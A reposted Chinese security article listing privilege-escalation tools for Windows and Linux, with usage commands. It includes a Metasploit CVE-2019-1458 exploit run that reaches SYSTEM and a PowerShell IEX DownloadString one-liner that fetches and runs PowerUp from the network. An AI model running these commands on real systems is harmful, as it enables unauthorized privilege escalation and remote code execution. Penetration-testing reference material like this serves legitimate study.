干货|提权扫描工具一览
2023-3-24 00:5:7 Author: LemonSec(查看原文) 阅读量:19 收藏

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1Find-AllVulns

使用msf查询补丁和可利用提权漏洞

# 查询补丁meterpreter> run post/windows/gather/enum_patches [+] KB2999226 installed on 11/25/2020[+] KB976902 installed on 11/21/2010
# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run
# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM

使用powerup检查提权漏洞

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改

accesschk "d:\dir"查看所有用户在d盘dir路径的子路径的权限
accesschk "Administrator "d:\dir"查看Administrator用户在d盘dir路径的子路径的权限
accesschk Administrators -c *查看Administrators组对所有服务的权限
accesschk -k Guest hklm\software查看Guest用户对hklm\software注册表的权限
accesschk -ou User查看User用户对全局对象的权限

转自Leticia's Blog

侵权请私聊公众号删文

 热文推荐  

欢迎关注LemonSec
觉得不错点个“赞”、“在看“

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247543766&idx=1&sn=145b7b19d36ac1895c5bb5d3cb49a6b9&chksm=f9e3448dce94cd9bd84babe3429641d4f1db70c9ab534d926b79e91ceca2d455eaf1c5b420b0#rd
如有侵权请联系:admin#unsafe.sh